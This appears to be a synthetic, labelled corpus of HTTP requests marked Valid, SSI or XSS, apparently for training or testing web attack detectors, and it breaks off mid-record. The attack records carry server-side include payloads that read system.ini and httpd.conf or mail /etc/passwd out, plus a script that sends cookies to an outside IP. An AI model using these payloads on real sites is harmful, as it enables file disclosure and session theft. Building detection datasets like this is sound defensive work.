Authorization: NTLM ZW5hNGhpb0Vlb29zZG50Nm9jdGxub3RpU2ZuVUFTcGg=
Range: 717-1161
Referer: /rutii/igrteile/utgot/ec1epta/eeaa.rar
TE: deflate,deflate,trailers
Trailer: Trailer
User-Agent: rmnozv2u2 (1T-Zp39; 2Bj80ql)
UA-CPU: x86
UA-Disp: 366,5288,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5343x014
Via: teit/3.4 www.db8oearn.js:402, HTTP/6.0 22.60.166.103
Transfer-Encoding: deflate
Upgrade: e2es/4.2, i4o/1.0, H5unol/4.6, puffs/2.0
Warning: 703 www.aish.jpg:056 "tnet" "Sat, 28 Jan 06 13:17:48 UTC"
X-Forwarded-For: 143.221.88.228
X-Serial-Number: 76880037963777825874
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14144
Start - Id: 32603
class: Valid
POST /nwnoTwnhs1h5/n0nc.html? HTTP/1.1
Content-Length: 124
Content-Language: yhbos,soo7f8m
Content-Encoding: identity
Content-Location: /nssgosFs/qgeMosee/1rds/ntdiuh.ace
Content-MD5: Z09zZXR0SWJybnRudDVkbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Jun 04 01:17:52 UTC
Last-Modified: Sun, 18 Apr 10 24:18:23 GMT
Host: www.blttieog.st:80
Connection: rwTetCt
Accept: */*;q=0.3
Accept-Charset: x-mac-roman;q=0.6, iso-8859-9, koi8, iso-2022-jp
Accept-Encoding: gzip;q=0.2, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 40.170.188.151
Cookie: Ls=]nhoe=sShT;8nopinoryHh=ssuOrx w;rofqfetpiethw=lism8gmtepmdeiIsz;nnSfceimr=o0etv@iratswSg'e;6o=tfrom5aeoheC:e NR neoy
Cookie2: $Version="8"
Date: Mon, 05 Apr 10 15:08:20 UTC
ETag: ".PJpmqZMBiHg.7eyv7"
Expect: 100-continue
If-Modified-Since: Thu, 04 Jun 09 02:51:10 CET
If-Unmodified-Since: Tue, 09 Nov 04 09:59:42 UTC
If-Match: "m0sYt-f0ZbfHIV3m-6fP"
If-None-Match: "g2oO.AhnQFCMLoCr"
If-Range: Mon, 28 Jun 04 09:09:39 GMT
Max-Forwards: 8910
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: aecitt tieaisk5=bh0mtg
Authorization: Basic aTRubmVpbXM6bnlhQ2Y=
Range: -619576,782-7
Referer: http://kit29.net/vO5usuem/el0ac/glot/evMc.sh
TE: chunked;q=0.9
Trailer: TE
User-Agent: psmoeri
UA-CPU: 68000
UA-Disp: 776,700,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 962x6124
Via: 9.1 220.81.43.224, 0.3 www.diilinr.shtml
Transfer-Encoding: deflate
Upgrade: fim4i/1.8, mvMta/2.8, jo9ve/6.8
Warning: 652 www.ep40.jpg "tyjyooc" "Tue, 15 Sep 09 02:05:36 UTC"
X-Forwarded-For: 64.19.200.199
X-Serial-Number: 34552
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

aeoLia2=0464&e9ho0ye= dharirTf&ntah9fti=9&oveeb1d3ltEl=atvarUmDe|moiuPl&ts4s4Qta=228&xndlosus=uwilce]y'Ntesock_streamr

End - Id: 32603
Start - Id: 40627
class: SSI
GET /iurTt7Saeprod/ome/e_PtIgAv/em_dqSWjlskIs4BIeaA3.css?a4ehqNiulssfe=t%2Fn%24nv+edMh%3Da3x5i&fP0j51.wI18=iItAZw%40jH8&es5eneu=64990241&nz8onrcp4=4876889&de=42272&31tt2htE=itwt&4U6poetosraoo=tnIservicesobjectu%3Fx3pr%3E6%2Brincludenx&6nnht59=sig&timIeser17e=509&QDv-YfNQ=Cf&3eslRsoebem6tnT=iwce%3Cdmail&tDpNiTdj-=tg%3DtaetcwhereuIPt&rkewnoralr=%3C%21--%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E HTTP/1.1
Host: www.azlw.be
Connection: keep-alive
Accept: application/*;q=0.0, image/jpeg;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.2, compress, identity;q=0.0
Accept-Language: iwIX-im;q=0.7, me-EhNzirn, eg-swt2p;q=0.1, c-h;q=0.7, eti-gyes;q=0.5
Cache-Control: max-stale=0
Client-ip: 134.67.83.123
Cookie: rraoo=22520
Cookie2: $Version="48"
Date: Thu, 04 Feb 10 01:14:40 CET
ETag: "IubpgWrdF_VsRCB06yK"
Expect: 100-continue
From: eneiaiie@acs8.cz
If-Modified-Since: Tue, 20 Jan 09 18:07:50 UTC
If-Unmodified-Since: Mon, 10 Jan 05 16:33:13 UTC
If-Match: *
If-None-Match: *
If-Range: "VbdJvACj9pZS1D5T"
Max-Forwards: 248
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: wssi Mwmtoon=YEtd6
Authorization: oWis nNNdt=vijfe
Range: -8,-65
Referer: http://www.xnjeiNrH.uk/rlqets8h.cgi
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/3.8 (compatible; MSIE 9.1; Windows NT; dat9nrdt3; ofpanl7ft; 7zaa5i)
UA-Disp: 959,926,32
Via: HTTP/6.2 186.215.138.155
Transfer-Encoding: ri2g
Upgrade: Rmh/4.4, haai/8.8, sr7/0.2, 8syo/9.3, invat/6.5
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 9481598521
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40627
Start - Id: 40009
class: SSI
GET /nXD2xYlE_.n-pZww/i2iaansb/Rssock_streamnmVXgZCe.gif?Rmes=7170332&erRdERr=%3C%21--++++%23exec++++cmd%3D%22%2Fbin%2Fmail++63.com+++%3C+++%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: 156.144.74.232
Connection: eSeo5hoa
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 7a-ajIihtja
Cache-Control: no-cache
Client-ip: 133.142.247.233
Cookie: LzGIshutdownr9.P=izUliUqRO;HtdlTedqphsen1=mWawRkCT92pV;ettuf=10;5dtfaik=80
Cookie2: $Version="2"
Date: Wed, 06 Apr 05 05:29:16 UTC
ETag: W/".1jeLkNVQ5pd_jD-7"
Expect: hniFtla
From: l1ahde@nablau.fr
If-Modified-Since: Mon, 01 Dec 08 04:21:23 GMT
If-Unmodified-Since: Thu, 31 Dec 09 24:04:13 UTC
If-Match: "I7rA8GDdpMZUlRoZtk"
If-None-Match: "xe71H-igFxQcyltCP"
If-Range: *
Max-Forwards: 694
MIME-Version: 9.8
Pragma: sL=ygcNu
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: l6eean drgnj=ervo3i
Range: 4761-
Referer: http://aTdhln.org/sEivgat/r7iihet.js
TE: deflate;q=0.1,trailers
Trailer: Host
User-Agent: Mozilla/8.4 (compatible; 6svdpeh; Linux i386; fnlto4; neensf; noluq46ze0)
UA-CPU: Sparc
UA-Disp: 603,321,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 219x816
Via: FTP/8.2 221.151.74.10, HTTP/4.0 www.hnsHa.jpeg, HTTP/7.2 160.153.35.253
Transfer-Encoding: identity
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40009
Start - Id: 1626
class: Valid
GET /nTr2reacnsT/naLeyrstpoiiE/t1nd-RbbNl9O6/atscfKcjfeb1JYr@0ic/clE1raenacinlz/IF/sKpber4tBJ@0vmPs9/mFglc.IdCq.xzIDHkm3f/dD7aatbndtq/oagR/eeF1ND2RZpHS-.U/dfn5Z.js?6ySiframe6depsZbgsoundunionh=346734&EAFm@OuLGuV=+l%3B+&Wspeiii=829368&HQitC84r=no%27Aem%29choOxn&eLn4efchaa=cd77s&1san=wnronee HTTP/1.1
Host: www.roilt.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, gzip
Accept-Language: al-i;q=0.3
Cache-Control: nmgevv='oxug'
Client-ip: 246.17.128.127
Cookie: 4telnetkqQ6a=ealsodiv;otsOsendenfaove=aayNtechoacceptys ;5adOkui5osswyh=zrrp)a
Cookie2: $Version="28"
Date: Sun, 20 Jul 08 08:34:28 GMT
ETag: "YBEH_-Ti1bROEmQq4OC@"
Expect: 100-continue
From: S6tD@nser.com
If-Modified-Since: Tue, 09 Oct 07 14:11:59 UTC
If-Unmodified-Since: Sat, 20 Nov 04 21:40:23 CET
If-Match: *
If-None-Match: "AdL06_oeUq6k_A5vD"
If-Range: "HOrT3SlqySbmdgFxbQ"
Max-Forwards: 761
MIME-Version: 7.4
Pragma: 2TTo=re
Proxy-Authorization: i2vGen celiyy=ey4ea
Authorization: Digest nc=5982Ee8f
Range: -60187,7-
Referer: http://www.peausdJc.fr/Dnrbq/rr5nxb/zrNr/iUoIoiq.cfm
TE: trailers,gzip;q=0.1
Trailer: Accept-Charset
User-Agent: ilp5qyN http://www.tele.be
UA-CPU: MIPS
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: t59ya/1.6 113.210.105.133
Transfer-Encoding: identity
Upgrade: ecl/4.8, rwegte/0.2, hr1m/6.0, yeanc/4.6
Warning: 152 71.253.87.10 "ioeasIse0a2llba" "Sat, 14 Apr 07 22:40:19 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 9219304
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1626
Start - Id: 15714
class: Valid
GET /dtHj5nxYf_6G3/rnbD/lqDHINgou4eKGHZAi/nHiyzOhg07dvpIShKPZx/TsawRffmrnow5y8sdy25/hmMn-kIIWSlSd.HJ-5OT/e3/slaappoo7vlrbe4.jpeg? HTTP/1.0
Host: www.eYhewvufa.com:80
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ngfm4es-hita
Cache-Control: max-stale
Client-ip: 21.70.72.139
Cookie: cehyuw2s8Enae=ooYa7Oe5broeh6n
Cookie2: $Version="216"
Date: Sat, 01 Apr 06 05:15:05 UTC
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: 6eatinnv
From: jBhna@eoo43leE.com
If-Modified-Since: Fri, 25 Sep 09 20:15:36 CET
If-Unmodified-Since: Thu, 17 Dec 09 09:46:45 CET
If-Match: *
If-None-Match: "8@RLoJXjrhI2gNwhBTwR"
If-Range: Sun, 19 Mar 06 14:54:44 GMT
Max-Forwards: 953
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWVvYnNqdDdpakllaDhodHN5ZWVZZUV2cnJlY3RvZWVlVHR0dHlkOGhmdGU=
Authorization: fupM ahigrje=sdnac
Range: 2-,-372
Referer: http://riQor5.ch/lUre.tar
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.4 (Windows; U; Win 9x 0.7; on-au; rv:2.1.3) Gecko/27929580
UA-CPU: MIPS
UA-Disp: 9331,266,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8122x873
Via: HTTP/7.6 www.eias.jpg:506
Transfer-Encoding: nueg
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 069 112.185.107.39:350 "sYhsia1oihNa7t" 
X-Forwarded-For: 42.186.95.123
X-Serial-Number: 555023929683
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15714
Start - Id: 39553
class: SSI
POST /DU8shutdownlsSl/9w4ztbs7ltrboeCeactb/hitd/TtzdgmehFteeo7aumbo/z6EFvOpasswdGF.usrDq.htm? HTTP/1.1
Content-Length: 213
Content-Language: oit
Content-Encoding: gzip
Content-Location: /udp5.mdb
Content-MD5: bnJ0ZUE4dHdiYXc1bmUwaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Aug 05 16:48:36 CET
Last-Modified: Mon, 04 Sep 06 01:09:27 GMT
Host: www.l4ltte.st
Connection: keep-alive
Accept: text/*, application/rtf;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, compress;q=0.3
Accept-Language: *;q=0.1
Cache-Control: min-fresh=787
Client-ip: 3.2.131.134
Cookie: oed6nHsCSa=%doirlue>gbgsoundy;rmAhtP2eiplE5ds=t;qse
Cookie2: $Version="6"
Date: Wed, 13 Dec 06 04:52:39 GMT
ETag: "jH5nNBEG4Q3ydGqFcPDi"
Expect: 100-continue
From: resjr@ovdSf3ie7i.biz
If-Modified-Since: Sat, 30 Jul 05 21:35:58 UTC
If-Unmodified-Since: Sun, 10 Jul 05 16:59:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: NTLM YXNTdGFhYWc4c0FlUmVhbzNibXNoc2FhbGZpaGlwcWRlaEpVZjZp
Referer: /knTmneaa/eAOe9nw5/9bstxoh/rnts.js
TE: trailers,deflate;q=0.2
Trailer: Accept-Encoding
User-Agent: Mozilla/7.4 (X11; U; Linux i386 0.9; se-Oe; rv:2.7.0) Gecko/44312230
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/7.1 94.79.90.11:60453, 3.6 www.t3uTwn.png:87, HTTP/3.8 40.112.111.113
Transfer-Encoding: deflate
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: --------------------
~~~~~: ~~~~~~~~~~~

6ryr9twoemS0l=etLairrn&rdsn=0ey=gir&t]&Y4y4Qbgsound4q=e:pPa8mfrw&aognt2eoewesn=&a|&srtH1l8n8eo=<!--    #include  virtual="/etc/httpd/httpd.conf"    -->&a8=%rls&iuzey7hp=Ulopuddsbo

End - Id: 39553
Start - Id: 17797
class: Valid
GET /etcx/laytlrsyNh2Fkg7e/fjNnaKD5YM-MU_/ar8dtato4osw/zbbAE2R-_0viXvEv/ta89hoiewd/a02iodyohA/nhRefn0nmnchjrlia.cfm? HTTP/1.1
Host: 76.240.33.4
Connection: close
Accept: image/png, image/*, application/*
Accept-Charset: x-mac-japanese;q=0.7, windows-1257;q=0.6, iso-8859-9;q=0.2, windows-1254;q=0.3, iso-8859-1
Accept-Encoding: 
Accept-Language: mwh0oa-rlId;q=0.1, cigrun-d6nsoHb;q=0.3, m-enwrit, l4-veadcy
Cache-Control: no-cache
Client-ip: 185.52.126.32
Cookie: esspUoM9r6shwc=71971119;ee3ht=slzt30oeoifngnaaWi;8iQaq6giandJth=or0xexecatcs1d
Cookie2: $Version="7"
Date: Wed, 07 May 08 15:35:03 GMT
ETag: W/"_vPuMsZzKZ_7lToRk9"
Expect: 100-continue
From: ljowseA@a57tItH0o.it
If-Modified-Since: Sun, 19 Sep 04 02:56:52 GMT
If-Unmodified-Since: Sun, 27 Feb 05 14:00:02 UTC
If-Match: "TUuyQdYpzwja2f_IgjeK"
If-None-Match: *
If-Range: Thu, 11 May 06 19:34:27 CET
Max-Forwards: 581
MIME-Version: 0.6
Pragma: emnespc='pvE'
Proxy-Authorization: NTLM NmVnaWhlaUJpcE5zTmVvb3R1bW4yc2NBcjRlRXFFckVvTmhvbG4=
Authorization: NTLM YnNldG45TnRFMWlkaWZzc2lyczFpdWNvZVk2b2VyalY=
Range: -542,05-69330,03-679
Referer: /wE2iibit.gz
TE: deflate;q=0.9
Trailer: If-None-Match
User-Agent: Mozilla/2.2 (compatible; MSIE 4.3; SunOS sun4u; EeerFrc2e; chaDalp7b; rmixaO)
UA-CPU: StrongARM
UA-Disp: 4032,6122,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 942x1602
Via: 6.0 183.133.38.72, 7.0 www.earsrr0o.gif, 4.2 www.tTrczwta.css:2686
Transfer-Encoding: identity
Upgrade: aie/2.7, lhn/6.7, Sure/2.4
Warning: 685 www.cMeV7n.jpg "Rshilnhailrb" "Fri, 30 Apr 10 23:05:54 CET"
X-Forwarded-For: 116.27.197.85
X-Serial-Number: 74706
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 17797
Start - Id: 12977
class: Valid
GET /processing-instructionLservices_8hdmthhx/5oyiriueetonnqihaolt/kwGkCf/sakHiyZaaet/id/irelrtdbihagmldkntf/retoeacsbcsrtrxrirar/soRypF1glYz-8jR5bn3.htm?sdetedph=8&tcitV7taryt=783303&sr5srFhte3i2y6u=06124&fser=4364&htaccesQKMg=gOn09n%3F8t1bule&oeformzUgVN=266&rbnj9aifhddl=nJ.t0&t9eheecxlTansi=+R%240sasdar&Z4d4e_UcBm_=aer&st=ts HTTP/1.0
Host: www.ontcehrb.gov
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: hz-gb-2312, euc-jp, x-mac-cyrillic, us-ascii
Accept-Encoding: 
Accept-Language: teiaue-e07yne;q=0.1
Cache-Control: no-transform
Client-ip: 254.14.215.121
Cookie: cetuc=o4De0lweed5buipzi2;2emddfneinzwlnl=95609;K9drd=rtts;Dz2h=e53u$
Cookie2: $Version="74"
Date: Tue, 14 Jun 05 07:42:07 GMT
ETag: W/"Nz82-qo_pRYuuHt"
Expect: 100-continue
From: picsvpm@izhyigm.biz
If-Modified-Since: Thu, 01 Dec 05 09:25:17 CET
If-Unmodified-Since: Tue, 17 Oct 06 14:32:46 GMT
If-Match: "nV4C4hNh1N4Yqysd1"
If-None-Match: "Oc_f8UL.KWVNAjzaq3fJ"
If-Range: "4_U7q.H-oLwA4Ee1"
Max-Forwards: 51
MIME-Version: 4.1
Pragma: ugib='snc'
Proxy-Authorization: Basic cjdHaGVsOm9zZW5tbklv
Authorization: Basic dGVoZHk6YWVyNmRl
Range: -49,43337-328,4-
Referer: http://sir3aU.gov/sepeckoo.asmx
TE: trailers,trailers
Trailer: TE
User-Agent: cturRttD/9.8.9.9.9
UA-CPU: MIPS
UA-Disp: 7394,680,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 501x762
Via: 4.0 163.99.186.196:62, HTTP/8.3 www.eoIaoi.gif, 3.2 www.5hEtnt.htm
Transfer-Encoding: identity
Upgrade: vskk/2.3, tfnsla/7.3, loe/7.8, iIaAoa/9.2
Warning: 343 199.227.129.137 "wbdtdimSsnaakz" "Fri, 07 May 04 12:46:34 UTC"
X-Forwarded-For: 182.133.25.200
X-Serial-Number: 39169260132979
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12977
Start - Id: 4940
class: Valid
POST /i8hceqpawy/L40ls9uBDmochaVyj/n3tbO/netsobcohnr/4rOxVElHf.php3? HTTP/1.0
Content-Length: 130
Content-Language: sa,i,rt
Content-Encoding: deflate
Content-Location: http://Sasae.com/esEu.gz
Content-MD5: Y2V1ZWI3Z2V0NWllbm9ZOA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Oct 09 12:10:46 UTC
Last-Modified: Wed, 17 Nov 04 18:01:55 CET
Host: www.tndWio.com
Connection: close
Accept: audio/*;q=0.4, image/*, video/*;q=0.8
Accept-Charset: koi8-r;q=0.8, cp-950
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 103.157.186.193
Cookie: du3exgwrsnl=hr=>k4r9;o6=21254797;8EROphpPPk=79129643
Cookie2: $Version="6"
Date: Thu, 19 Feb 04 24:32:10 GMT
ETag: "Mmj.38E6t4GeYzLQH_KA"
Expect: 9amne
From: tsamc1M@it8Et.ch
If-Modified-Since: Mon, 08 Jan 07 09:29:51 UTC
If-Unmodified-Since: Wed, 04 Jul 07 12:49:51 GMT
If-Match: "-TRSs0p7uwnJf_YaiWG"
If-None-Match: "LTQCkiQ1EAlWG_Z4"
If-Range: Mon, 25 Apr 05 13:04:06 GMT
Max-Forwards: 510
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM bHRsem5hb2xkMHhhbmtldGdodmNhcG54OWlwZTExbnRzbzQ=
Authorization: Basic YnQxczpjZXB0
Range: -358824,90202-39,79-
Referer: /sbbaIm0s/cesc.asmx
TE: chunked,chunked;q=0.8
Trailer: Expect
User-Agent: ruaascvd (tMGD1gs6)
UA-CPU: Sparc
UA-Disp: 979,352,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4223x6180
Via: FTP/8.9 www.purlR.shtml:50, hluc9/1.6 www.iompcA.css
Transfer-Encoding: compress
Upgrade: fFAahd/7.2, t4Oi/2.4
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 18.33.117.239
X-Serial-Number: 2881856065
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dhr=ivotc&nrhtEd=96940&hsSdztmon7y2wsi=|i>nfNzpp$boot.ini&iyogixn48sc=ol n&u4sfi=ws0JLjQ71&UJN284w=tdCcm.zO&Yyl4Ii6G=hf8t9ma

End - Id: 4940
Start - Id: 46795
class: XSS
PUT /-bW3r/LhtpassLPcJ/lVRPkubyBlWVZ./Nyoallwindow.open0Y.cfm? HTTP/1.1
Content-Length: 281
Content-Language: ge
Content-Encoding: gzip
Content-Location: http://bveaunta.com/o96e/Tsel49o/9uleqsAe.aspx
Content-MD5: Y2RsazdtaGJhdGhFcnBzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Mar 08 17:51:20 UTC
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: www.oeoyseuton.st
Connection: close
Accept: */*;q=0.6
Accept-Charset: utf-7, x-mac-arabic;q=0.6, windows-1255, x-mac-hebrew;q=0.2
Accept-Encoding: identity, identity
Accept-Language: tR3n-akiYjwi8;q=0.5, a6-se;q=0.3, 8kmwNki-daon9;q=0.8
Cache-Control: min-fresh=74
Client-ip: 48.205.211.117
Cookie: lywtVen=8
Cookie2: $Version="17"
Date: Thu, 10 Dec 09 02:14:50 UTC
ETag: W/"w6tFK0pcm3oEf.Rt"
Expect: Ksasyns
From: t6qI@adwi.net
If-Modified-Since: Mon, 22 Nov 04 18:32:15 CET
If-Unmodified-Since: Tue, 14 Nov 06 16:51:08 GMT
If-Match: *
If-None-Match: *
If-Range: "icS7uH.4ofWdvcIWE"
Max-Forwards: 694
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: NTLM ZGVnN2FhYWR1eGxhZWRlZWJvYVRhc29uZW90YWllazNyMA==
Range: 15-86
Referer: /dqaFomF.msf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.6 (Windows; U; Windows NT 3.2; ie-le; rv:0.2.1) Gecko/22311807
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: HTTP/9.1 www.ez2uo.htm, 6.4 www.nrno.jpg:862, 7.5 242.212.211.249
Transfer-Encoding: nBooad; 5mBetre=oph03ye
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

glilvziek=46&GelBZQy2mx1=al&ef9a==+beeac7aWtg&si9msd=4e&urahwa=<<script    >[window.open('http://234.85.145.175/an.cfm'+document.cookie);]</script    >&eoiLt=yd8metmpepusaeos&fessrnEdu=cYeSQ8BwNAa&io=ikqH_5gI&xheS=|sr &a0euEv=1Awef:oelpn

End - Id: 46795
Start - Id: 10146
class: Valid
GET /qcyi/awLEAjyGZa_lrP5G4/nsatuucouehonteTlAt/FjztV39UnzOubnetcat/formchdE0child.@4jbx0O/DACbS1ktVXwgetbmail/sjzm/tfoyzthtp3tncLa1.htm?XfZGNZ6=feshaio%25e&evP2hXq=28 HTTP/1.1
Host: 209.122.4.214
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Mq-dtTy8qo, hsodo-hs, m-aastrl, oy-ispnd
Cache-Control: no-transform
Client-ip: 128.232.71.123
Cookie: tt6eto=otCYOP9ikF;TDCpositiongFchildpvL=nEfgeuionninaoa
Cookie2: $Version="9"
Date: Thu, 09 Oct 08 09:18:55 CET
ETag: W/"@_LdD5SoTth2FBGOiH8n"
Expect: wsnon
From: oo2eh@aavy.com
If-Modified-Since: Fri, 17 Dec 04 15:02:30 GMT
If-Unmodified-Since: Wed, 17 Jun 09 10:41:02 GMT
If-Match: *
If-None-Match: "WQpUy.dQmpK57aPoxhA"
If-Range: Wed, 15 Aug 07 14:28:25 CET
Max-Forwards: 6559
MIME-Version: 0.8
Pragma: j=xwe7
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: Digest qop=ellhs
Range: 962502-,4-
Referer: http://aagY.biz/lsntt/mntg4h/uttennt.nsf
TE: trailers
Trailer: Upgrade
User-Agent: 0antk4hyl/8.9.2
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 012x3228
Via: FTP/0.1 187.76.226.254:35, FTP/3.6 www.th8Pesuw.png
Transfer-Encoding: gzip
Upgrade: ebfs/2.8, haslr/4.2, fet/5.1
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 59958700676533276
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10146
Start - Id: 21537
class: Valid
GET /laeey4hh9tHgnnm/n8nrlodsagledsoigr.html? HTTP/1.0
Host: www.Teehnt3t3.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=605
Client-ip: 145.238.161.146
Cookie: unhrcgesdnoamo=qtealikeconnectlordD&q;vtx2teSt=kL9;iez=1020;inputYSdSK.9j=0dh;cmkfm4tmEcbt8mo=666;iu1becof=rxq3asdqlce1xt
Cookie2: $Version="72"
Date: Mon, 26 Feb 07 12:34:57 UTC
ETag: W/"z@PRZXujoWJ8d37tNc"
Expect: 100-continue
From: secins@cI7fv.st
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Thu, 02 Dec 04 20:02:58 GMT
If-Match: "l._LQIQ@Pj09fqflG"
If-None-Match: *
If-Range: Sun, 11 Oct 09 07:43:04 CET
Max-Forwards: 84
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic ZnV0eGFyaW86aWVhcTE=
Authorization: Basic ZDNvNWV1eHQ6Z285dA==
Range: 2514-,-4567,968-760
Referer: http://www.6j7wtt.st/et3icre/asn2sm.tiff
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.7 (Windows; U; Win98 1.9; Pa-o3; rv:9.6.9) Gecko/89954297
UA-CPU: StrongARM
UA-Disp: 974,667,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0542x2765
Via: HTTP/4.4 www.dlOi4.png, HTTP/3.7 209.67.29.134, 8.7 www.mFrv.htm
Transfer-Encoding: yutoa; sadpoahy=4shaqsoe
Upgrade: hhes/4.9
Warning: 259 71.203.229.140:808 "Jrhhudnemi0e" "Tue, 14 Apr 09 04:55:14 UTC"
X-Forwarded-For: 225.114.104.225
X-Serial-Number: 3004576514
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21537
Start - Id: 23974
class: Valid
GET /iathmls/x8wgehtijI6ljsnrn/eodeoseei5mi.php3?7arpo2NlesNkue=anl&nh=4954782387&9ajEeet=N&rrcjtcert8=cht&Cnin2lethr=74&jse1g=%24m&xiatada=ygesAe&msesc=307 HTTP/1.1
Host: www.hi04d1.gov
Connection: keep-alive
Accept: text/plain;q=0.0, audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 8reyn-tpdaos, Lbphrt-m;q=0.8, Saw-ojieasas, inzS-kto1ri;q=0.3
Cache-Control: only-if-cached
Client-ip: 98.45.103.252
Cookie: amzsTy2seleioC=v2y;fple7uh=rC7e;zo=etaf;qnmRtmD29t=pSdothoNqah
Cookie2: $Version="33"
Date: Thu, 27 Apr 06 04:00:01 GMT
ETag: W/"S8SpMd3ksau@hp111U_"
Expect: 100-continue
From: htqn@tqeodss7o.fr
If-Modified-Since: Thu, 16 Apr 09 19:21:43 GMT
If-Unmodified-Since: Sun, 27 Apr 08 03:33:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest response="ba7BF36D67CB2cC425979bBC24Eee9fF"
Authorization: Basic dGpobzp0dDFpZW4=
Range: 1318-,5425-185
Referer: http://www.NSotr.uk/l14le/ohfc/nbae7jn.swf
TE: chunked;q=0.5,gzip,chunked
Trailer: Accept-Charset
User-Agent: cmXwSiH8 http://www.syo3ee8e.gov
UA-CPU: StrongARM
UA-Disp: 862,451,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 424x2298
Via: 7.2 42.38.169.145
